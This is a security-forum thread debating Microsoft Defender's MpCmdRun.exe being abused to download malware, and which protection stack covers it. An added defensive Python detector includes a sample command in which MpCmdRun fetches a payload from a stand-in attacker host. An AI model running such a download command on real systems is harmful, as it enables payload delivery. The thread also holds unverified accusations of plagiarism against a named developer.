Microsoft Defender can ironically be used to download malware

Status
Not open for further replies.
In other words, should we be concerned about this "vulnerability" in WD if we are using ConfigDef at HIGH?

And just add VS to close all the "holes" in WD?
It is not a "vulnerability" in WD, but rather a "vulnerability" in Windows - it will work with any AV installed. It also does not decrease the protection of the ConfigureDefender HIGH settings. The number of malware samples that can download something via LOLBins from a remote location will not be much greater. It is as true as saying that introducing a new kind of expensive vodka does not increase the number of drinkers (some drinkers will stop drinking Polish vodka and start drinking MpCmdRun vodka).
Using VS will add some protection to this setup, just like without MpCmdRun. (y)
 
There are ways to protect the system without killing it ;).
Yes. Another one can be also VS. Some ways can be as different as Boxing and Judo.
 
Yes. Another one can be also VS. Some ways can be as different as Boxing and Judo.
Which is why the best martial art is the one that adapts all of the strongest techniques from all of the various disciplines, like boxing, judo, kung fu, jujitsu, karate, aikido, etc., and combines the strongest techniques into one killer martial art. This is what Jim Harrison did when he created Bushidokan, and why Bruce Lee called Jim "one of the most dangerous men in the world". For example, a boxer is pretty tough to beat standing up, but if you can get him on the ground it is all over for him.
 
Which is why the best martial art is the one that adapts all of the strongest techniques from all of the various disciplines, like boxing, judo, kung fu, jujitsu, karate, aikido, etc., and combines the strongest techniques into one killer martial art. This is what Jim Harrison did when he created Bushidokan, and why Bruce Lee called Jim "one of the most dangerous men in the world". For example, a boxer is pretty tough to beat standing up, but if you can get him on the ground it is all over for him.
It is interesting, but are we still talking about Microsoft Defender? :unsure:
Anyway, it is probable that using such protection would be as hard as becoming Jim Harrison. :)
But seriously, you have just described the AV with Advanced Threat Protection.
 
It is interesting, but are we still talking about Microsoft Defender? :unsure:
Anyway, it is probable that using such protection would be as hard as becoming Jim Harrison. :)
My point is that all protections are not equivalent.

When a product is easier to effectively use than UAC and WD, then it is certainly not a concern ;).

I eagerly await your WDAC implementation! BTW, what ever happened to CHEF-KOCH's github fork of H_C? Didn't he used to work for Microsoft? He could have done some really cool stuff on your project.
 
My point is that all protections are not equivalent.
Just like my point. :)
I eagerly await your WDAC implementation! BTW, what ever happened to CHEF-KOCH's github fork of H_C? Didn't he used to work for Microsoft? He could have done some really cool stuff on your project.
He has been thinking in silence for some months. :unsure:
 
But seriously, you have just described the AV with Advanced Threat Protection.
Absolutely not. Jim only included 7 basic stances, blocks, strikes and kicks, but they were all extremely effective techniques.
 
For most average PC users, imo the goal has always been to find the software that offers the "best" protection without bloat and complexity that makes people confirm a yes when they should say no. That being said, what software or combination fits this description? I am currently using WDConfigHIGH + VS(v5.97aBeta) + SWH.

This thread is making me wonder now if I should now switch to another free AV that is less of a target. For example Avast Free, set up in minimum protection config, and then just add VS? This would eliminate all the compensating WD add-ons. Have not decided yet on WD, just soliciting opinions.
 
How does Voodooshield handle this particular issue? I am not asking about general philosophy, but rather about the particular issue addressed in the OP.
 
BTW, what ever happened to CHEF-KOCH's github fork of H_C? Didn't he used to work for Microsoft? He could have done some really cool stuff on your project.
His whole account got deleted (and I'm personally not shocked).

Yes, he listed Microsoft in his account profile, but that doesn't mean it was true, nor does it say which group he was in if it was true.

Also, Chefkoch stole work from others and published it as a new project under his own name without any credits. That's also the reason why all his projects became unmaintained. He got a lot of anger from many people because of that.
See e.g. FACT: CHEF-KOCH plagiarizes and passes off other people's work as his own · Issue #323 · ghacksuserjs/ghacks-user.js
 
For most average PC users, imo the goal has always been to find the software that offers the "best" protection without bloat and complexity that makes people confirm a yes when they should say no. That being said, what software or combination fits this description? I am currently using WDConfigHIGH + VS(v5.97aBeta) + SWH.

This thread is making me wonder now if I should now switch to another free AV that is less of a target. For example Avast Free, set up in minimum protection config, and then just add VS? This would eliminate all the compensating WD add-ons. Have not decided yet on WD, just soliciting opinions.
If I understand everything written about it correctly, you are well protected against this with WD, VS and SWH.
WD detects this, and VS and/or SWH would block the suspicious download due to anti-script (command-line) protection.
Another AV could not block this vulnerability, which is present in Windows.
That means switching AV would not make you less vulnerable, maybe just the opposite.
 
For most average PC users, imo the goal has always been to find the software that offers the "best" protection without bloat and complexity that makes people confirm a yes when they should say no. That being said, what software or combination fits this description? I am currently using WDConfigHIGH + VS(v5.97aBeta) + SWH.

This thread is making me wonder now if I should now switch to another free AV that is less of a target. For example Avast Free, set up in minimum protection config, and then just add VS? This would eliminate all the compensating WD add-ons. Have not decided yet on WD, just soliciting opinions.
I personally believe that WDConfigHIGH + VS(v5.97aBeta) + SWH is an amazing combo, especially when paired with either WD or a good free AV. This one single WD vulnerability is not really the main issue. The issue really is that WD is the most targeted AV. It really has turned into an amazing AV over the last couple of years, and from what I remember, I think it has about 50% of the marketshare... so it is the most targeted. But it is still an amazing AV, and it is free ;).
 
I personally believe that WDConfigHIGH + VS(v5.97aBeta) + SWH is an amazing combo, especially when paired with either WD or a good free AV. This one single WD vulnerability is not really the main issue. The issue really is that WD is the most targeted AV. It really has turned into an amazing AV over the last couple of years, and from what I remember, I think it has about 50% of the marketshare... so it is the most targeted. But it is still an amazing AV, and it is free ;).

So to minimize the issue of most targeted, we come back full circle to the old discussion that although WD is good one might be better off with a more robust AV. On the other hand, if ConfigDefender + SWH +VS compensates for WD's deficiencies, then one should just stick with it. Agree?
 
How does Voodooshield handle this particular issue? I am not asking about general philosophy, but rather about the particular issue addressed in the OP.
VS will protect against this attack in several ways. First, VS considers the entire attack chain. For example, conhost is not a malicious process, but it can be used as one if called by a malicious parent. Hopefully that makes sense, otherwise I can go into further details if you want.

Second, all but like 5 or so Windows files are considered vulnerable processes by VS, so they are automatically added to the vulnerable process list, along with a huge list of other processes that are outside of the Windows System folder. The problem with this particular WD vulnerability is that its binaries are in the ProgramData folder as opposed to the Windows system folder. So right now I am testing to make sure we can add this item to VS's vulnerability list to provide even further protection, and if we can add it as a vulnerable process, all I have to do is update the vulnerable process list in the cloud, and VS will automatically update everyone's vulnerability list, which happens every 4 hours and when VS starts.
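The detection logic described in the last two posts (command-line inspection, looking at the whole parent/child chain, and the fact that Defender's MpCmdRun.exe lives under ProgramData rather than the Windows system folder), as an added example that is not part of the thread and is not VoodooShield's, SWH's or Defender's own code. It scores constructed Sysmon-style process-creation events. The `-DownloadFile -url <url> -path <path>` switch is the documented MpCmdRun.exe option the linked article is about; the process lists, scores, threshold, platform version directory and sample events are assumptions made for this illustration.

```python
import re
import ntpath
from dataclasses import dataclass, field

# Documented Defender command line the thread is about:
#   MpCmdRun.exe -DownloadFile -url <url> -path <local path>
DOWNLOAD_FLAG = re.compile(r"(?i)(?:^|\s)-DownloadFile(?:\s|$)")
URL_ARG = re.compile(r"(?i)-url\s+(\S+)")

# Where MpCmdRun.exe legitimately lives. The second location is the one the
# post above points out: a "vulnerable process" list keyed on the Windows
# system folder never sees it, because the platform binaries sit under ProgramData.
DEFENDER_DIRS = (
    r"c:\program files\windows defender",
    r"c:\programdata\microsoft\windows defender\platform",
)

# Signed Microsoft binaries that are harmless on their own but worth a look when a
# script host or an Office application is the parent (assumed lists for this
# example, not any vendor's actual process list).
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
LOLBINS = {"mpcmdrun.exe", "conhost.exe", "certutil.exe", "bitsadmin.exe"}

ALERT_THRESHOLD = 50  # assumed value; tune to your own false-positive budget


@dataclass
class Finding:
    score: int = 0
    reasons: list = field(default_factory=list)


def _base(path: str) -> str:
    return ntpath.basename(path).lower()


def _in_defender_dir(image: str) -> bool:
    p = image.lower()
    return any(p.startswith(d + "\\") for d in DEFENDER_DIRS)


def assess(event: dict) -> Finding:
    """Score one process-creation event with Image, CommandLine and ParentImage."""
    image = event.get("Image", "")
    cmd = event.get("CommandLine", "")
    child, parent = _base(image), _base(event.get("ParentImage", ""))
    f = Finding()

    if child == "mpcmdrun.exe":
        if not _in_defender_dir(image):
            # Same file name outside the two known directories: a renamed copy.
            f.score += 40
            f.reasons.append(f"MpCmdRun.exe running from unexpected path {image}")
        if DOWNLOAD_FLAG.search(cmd):
            m = URL_ARG.search(cmd)
            f.score += 50
            f.reasons.append("MpCmdRun.exe used as a downloader"
                             + (f" (url={m.group(1)})" if m else ""))
            if parent in SCRIPT_HOSTS | OFFICE_APPS:
                # The parent chain is what turns a signed tool into an attack step.
                f.score += 30
                f.reasons.append(f"download initiated by {parent}")
    elif child in LOLBINS and parent in OFFICE_APPS:
        # e.g. conhost.exe under WINWORD.EXE: a macro opened a console.
        f.score += 60
        f.reasons.append(f"{child} spawned by {parent}")
    return f


def is_alert(event: dict) -> bool:
    return assess(event).score >= ALERT_THRESHOLD


# Constructed sample events (not real telemetry); the version directory is illustrative.
_PLAT = r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2009.7-0"
_DL = "MpCmdRun.exe -DownloadFile -url http://evil.example/p.exe -path C:\\Users\\Public\\p.exe"
SAMPLE_EVENTS = {
    "signature_update": {
        "Image": _PLAT + r"\MpCmdRun.exe",
        "CommandLine": '"MpCmdRun.exe" -SignatureUpdate',
        "ParentImage": _PLAT + r"\MsMpEng.exe",
    },
    "lolbin_download": {
        "Image": _PLAT + r"\MpCmdRun.exe",
        "CommandLine": _DL,
        "ParentImage": r"C:\Windows\System32\cmd.exe",
    },
    "renamed_copy": {
        "Image": r"C:\Users\Public\MpCmdRun.exe",
        "CommandLine": _DL,
        "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    },
    "office_spawns_console": {
        "Image": r"C:\Windows\System32\conhost.exe",
        "CommandLine": "conhost.exe 0xffffffff -ForceV1",
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
    },
}

if __name__ == "__main__":
    for name, ev in SAMPLE_EVENTS.items():
        f = assess(ev)
        print(f"{name:24} score={f.score:3} alert={is_alert(ev)} {f.reasons}")
```

To run it on real data, map Sysmon Event ID 1 or Security 4688 fields into the same dict. The path check exists because of the point made in the post: the Defender platform directory is under ProgramData, so any allow-list or vulnerable-process list that only looks at the Windows folder misses MpCmdRun.exe entirely, while a renamed copy of it dropped elsewhere is exactly what the check catches.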
 
His whole account got deleted (and I'm personally not shocked).

Yes, he listed Microsoft in his account profile, but that doesn't mean it was true, nor does it say which group he was in if it was true.

Also, Chefkoch stole work from others and published it as a new project under his own name without any credits. That's also the reason why all his projects became unmaintained. He got a lot of anger from many people because of that.
See e.g. FACT: CHEF-KOCH plagiarizes and passes off other people's work as his own · Issue #323 · ghacksuserjs/ghacks-user.js
Very interesting... I was wondering what happened ;).
 
So to minimize the issue of most targeted, we come back full circle to the old discussion that although WD is good one might be better off with a more robust AV. On the other hand, if ConfigDefender + SWH +VS compensates for WD's deficiencies, then one should just stick with it. Agree?
Yeah, exactly. And the fact that WD is the most targeted does not mean you are going to be infected if you use WD. It simply means it is the most targeted, which is unfortunate ;). BTW, when Andy finishes his WDAC implementation (hopefully on SWH), I will be adding that to my machines as well.
 
Are there any alternatives to VoodooShield that are paranoid about this article?
Hard_Configurator or Simple Windows Hardening both from @Andy Ful would block the suspicious download due to anti-script (command-line) protection according to Andy. Of those two Simple Windows Hardening is the most a set and forget type of software.
 
Are there any alternatives to VoodooShield that are paranoid about this article?
It is a valid question, because most readers will be frightened after reading the article. So, there are some alternatives, but they are not necessary at all. Changing the protection due to this article would be as reasonable as changing computer protection because it is raining. :) (y)
 